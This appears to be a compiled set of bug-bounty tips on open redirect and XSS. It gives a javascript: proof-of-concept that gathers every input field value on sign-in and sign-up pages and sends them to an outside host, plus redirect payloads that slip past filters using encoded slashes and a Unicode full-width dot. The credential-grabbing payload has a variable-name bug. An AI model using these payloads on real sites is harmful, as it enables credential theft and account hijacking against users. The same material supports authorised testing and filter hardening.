Open Redirect
When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them PoC: javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i<inpts.length;i++){info+=','+inputs[i].value};location.href='https://xhze.em/?'+info
There are many DM people with me about this bug. As a result, I have consolidated all my processed "Open redirects" reports this month.
Payloads bypass most filters:
http:http:evil[.]com http:/evil%252ecom ///
when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character. try to bypassed using other Unicode characters. I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82". poc: redirect_to=////evil%E3%80%82com #BugBounty #bugbountytip
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